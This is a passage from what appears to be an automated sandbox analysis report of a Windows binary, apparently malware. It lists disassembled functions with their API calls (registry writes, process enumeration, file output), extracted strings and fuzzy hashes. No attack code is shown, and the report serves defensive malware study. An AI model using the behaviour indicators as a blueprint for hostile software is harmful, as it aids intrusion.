                                                                                  • Instruction Fuzzy Hash: 1F215CB4A04707BFEF11EBB9E446B9C77F5EB48705F116495E600E7A80D7389A48CB22
                                                                                  Function 6A6E46C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _swscanf$_memset_vscan_fn
                                                                                  • String ID: %[^/]%s$%[^:]:%d%s$http://
                                                                                  • API String ID: 2379712460-1994117949
                                                                                  • Opcode ID: e38a0bf4f1233f8e38c072bb94d193ea068caa636057e390ae5f22d2fd6f609c
                                                                                  • Instruction ID: 8f3996b0ee8d66332af5e444072fede2b9b548f7ba4b0553715dd507fa366399
                                                                                  • Opcode Fuzzy Hash: e38a0bf4f1233f8e38c072bb94d193ea068caa636057e390ae5f22d2fd6f609c
                                                                                  • Instruction Fuzzy Hash: 04118CB1A0930067EA22C738DC48BEB73D86F96704F454828E98843245FF71E20982E7
                                                                                  Function 0BEB7294 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0BEB60E4: GetObjectA.GDI32(?,00000004), ref: 0BEB60FB
                                                                                    • Part of subcall function 0BEB60E4: GetPaletteEntries.GDI32(?,00000000,?), ref: 0BEB611E
                                                                                  • GetDC.USER32(00000000), ref: 0BEB72D2
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0BEB72DE
                                                                                  • SelectObject.GDI32(?), ref: 0BEB72EB
                                                                                  • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0BEB7343,?,?,?,?,00000000), ref: 0BEB730F
                                                                                  • SelectObject.GDI32(?,?), ref: 0BEB7329
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB7332
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0BEB733D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                                  • String ID:
                                                                                  • API String ID: 4046155103-0
                                                                                  • Opcode ID: 95736c6e41b07f0b96711fef0a0910f575c84bb553cbb0118bdb3119dc364a78
                                                                                  • Instruction ID: ffdb1362f8575bbc0944bda61f8874dd77875fa04fefdc4eaf0191e686274f0c
                                                                                  • Opcode Fuzzy Hash: 95736c6e41b07f0b96711fef0a0910f575c84bb553cbb0118bdb3119dc364a78
                                                                                  • Instruction Fuzzy Hash: 02115172E14219AFDF10EBE8D851EAFB3BCEB48300F4054A5E914D7650E7749E4487A0
                                                                                  Function 6A6F4E65 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6A6F4E95
                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6A6F4EB8
                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6A6F4ED4
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 6A6F4EE4
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 6A6F4EEE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreate$Open
                                                                                  • String ID: software
                                                                                  • API String ID: 1740278721-2010147023
                                                                                  • Opcode ID: 005f434ff837a1dc2e703e5ae5f6145b2ce0e7bc5d0e75ba75f0725d063eeaf3
                                                                                  • Instruction ID: b07ffac5647438392b9292fe8759ec503479f882ae5eb752481033c305cbd564
                                                                                  • Opcode Fuzzy Hash: 005f434ff837a1dc2e703e5ae5f6145b2ce0e7bc5d0e75ba75f0725d063eeaf3
                                                                                  • Instruction Fuzzy Hash: FD11E376D00219FB8B21DADACD88CDFBFBEEBCA750B1140AAA504A2111D6719E01DB64
                                                                                  Function 0BE9EC4C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0BE9EAB4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0BE9EAD0
                                                                                    • Part of subcall function 0BE9EAB4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0BE9EAF4
                                                                                    • Part of subcall function 0BE9EAB4: GetModuleFileNameA.KERNEL32(500BEFB6), ref: 0BE9EB0F
                                                                                    • Part of subcall function 0BE9EAB4: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0BE9EBB3
                                                                                  • CharToOemA.USER32(?,?), ref: 0BE9EC83
                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0BE9ECA0
                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0BE9ECA6
                                                                                  • GetStdHandle.KERNEL32(000000F4,0BE9ED10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0BE9ECBB
                                                                                  • WriteFile.KERNEL32(00000000,000000F4,0BE9ED10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0BE9ECC1
                                                                                  • LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 0BE9ECE3
                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0BE9ECF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 185507032-0
                                                                                  • Opcode ID: 45406ac20ac22bc172c244ac08195ca488fa875f63a8078e1b7fff86f3b38718
                                                                                  • Instruction ID: 2a140a60f8ff9468d996f55eda9b728aa4f71b68664234eac02c5e30a066c2cd
                                                                                  • Opcode Fuzzy Hash: 45406ac20ac22bc172c244ac08195ca488fa875f63a8078e1b7fff86f3b38718
                                                                                  • Instruction Fuzzy Hash: 82115AB2154305BEDB00E7A4EC42F9B77ECAB84610F402A26B758D60E1DB74E94C8766
                                                                                  Function 6A6F3E1B Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6A6F3E22
                                                                                  • __CxxThrowException@8.LIBCMT ref: 6A6F3E2C
                                                                                    • Part of subcall function 6A7013A2: RaiseException.KERNEL32(?,?,00000000,?), ref: 6A7013E4
                                                                                  • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3E43
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3E50
                                                                                    • Part of subcall function 6A6EE1FA: __CxxThrowException@8.LIBCMT ref: 6A6EE210
                                                                                  • _memset.LIBCMT ref: 6A6F3E6F
                                                                                  • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,?,?,00000001), ref: 6A6F3E80
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3EA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                  • String ID:
                                                                                  • API String ID: 356813703-0
                                                                                  • Opcode ID: 3e033a48a5abb8fc1fe89177cd8e5bfad9edbd34823a322e29bbfb3a410df61f
                                                                                  • Instruction ID: 1af4b4908c141ad5c17ca32badbfc11e6a42a0b45d1d1a843a5ed0ba8dc0c060
                                                                                  • Opcode Fuzzy Hash: 3e033a48a5abb8fc1fe89177cd8e5bfad9edbd34823a322e29bbfb3a410df61f
                                                                                  • Instruction Fuzzy Hash: 79113C70500606AFDB20AF64C88DC6BBBF6FF41318711C929F95696555CF34AC15CFA4
                                                                                  Function 6A6D1AF0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\pl.txt
                                                                                  • API String ID: 3727115324-85274317
                                                                                  • Opcode ID: 6fb3710159b9eaf6ba8099d8dd8301df0857547208a248e28ee66f6ad5efb83e
                                                                                  • Instruction ID: 1d6304dac848d52b37556bfc950336f208629421f10a47390e89277d468f5485
                                                                                  • Opcode Fuzzy Hash: 6fb3710159b9eaf6ba8099d8dd8301df0857547208a248e28ee66f6ad5efb83e
                                                                                  • Instruction Fuzzy Hash: FD012BB1D0422167E30096A89D58FAB3BE95F822C0F1A8511F94897222EE60E90DC3E5
                                                                                  Function 6A6D1CA0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\pl.txt
                                                                                  • API String ID: 3727115324-85274317
                                                                                  • Opcode ID: 51125939bb5a43f679e928450e508b071cd2e41894781f2657591012dd31054f
                                                                                  • Instruction ID: b16cb5c3122eef44a79e44959416db4290028571b26a9fe54412158c17b4d875
                                                                                  • Opcode Fuzzy Hash: 51125939bb5a43f679e928450e508b071cd2e41894781f2657591012dd31054f
                                                                                  • Instruction Fuzzy Hash: 25014E7190812567D30097A89D48F9B3BF98FC1284F1A4510FA54E7212DF64E90DC3E5
                                                                                  Function 6A6D1D30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\pl.txt
                                                                                  • API String ID: 3727115324-85274317
                                                                                  • Opcode ID: 90a169d44067d8161744e75840ccdc84d934a1268c3e5fb2854693f69785bce9
                                                                                  • Instruction ID: 3cceb579ae20f343646a091740c09fc86ad99a65e26eac10be325f0ad3335aca
                                                                                  • Opcode Fuzzy Hash: 90a169d44067d8161744e75840ccdc84d934a1268c3e5fb2854693f69785bce9
                                                                                  • Instruction Fuzzy Hash: FF01FC7290421567E600EA649D5CF973BF58F85348F0A4914F54097252DFB4E90DC7E5
                                                                                  Function 6A6DFE90 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6DFEB8
                                                                                    • Part of subcall function 6A6E05A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,?), ref: 6A6E05C3
                                                                                    • Part of subcall function 6A6E05A0: _memset.LIBCMT ref: 6A6E05DA
                                                                                    • Part of subcall function 6A6E05A0: Process32First.KERNEL32 ref: 6A6E05F0
                                                                                    • Part of subcall function 6A6E05A0: CloseHandle.KERNEL32(00000000), ref: 6A6E05FA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                  • String ID: .$d$m$w$x
                                                                                  • API String ID: 113637525-2193154829
                                                                                  • Opcode ID: 3312bf2ab79443254e0d5aec8ea6410b283a42c37909150b9eeee4e5a14e38e6
                                                                                  • Instruction ID: 19e6cfcc88e4a6d06cca9f2b92cc2baa8d9015d801f41ba81578deaaf2c991ab
                                                                                  • Opcode Fuzzy Hash: 3312bf2ab79443254e0d5aec8ea6410b283a42c37909150b9eeee4e5a14e38e6
                                                                                  • Instruction Fuzzy Hash: 99018B7150C3818EE311DB28D849BDBBFE55B92248F44482DE4D886242EB75A60CC7F3
                                                                                  Function 6A6E1950 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32COMMON
                                                                                  Download Yara Rule
